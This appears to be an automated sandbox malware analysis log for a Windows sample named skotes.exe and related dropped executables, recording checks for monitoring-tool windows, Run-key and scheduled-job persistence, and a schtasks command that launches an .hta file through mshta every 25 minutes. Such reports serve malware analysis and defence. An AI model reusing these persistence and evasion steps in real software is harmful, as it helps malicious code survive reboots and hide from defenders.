Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f

Creates job files (autostart)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afccf6841f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afccf6841f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		8_2_00F2F98E
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00FA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		8_2_00FA1C41

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
